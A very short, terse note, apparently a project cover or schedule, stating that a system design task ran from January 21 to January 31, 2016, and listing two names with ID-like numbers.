jan21/2016 System
design
It has
completed
to be
jan31/2016
fekadu 4945/05
mohamed 1255/05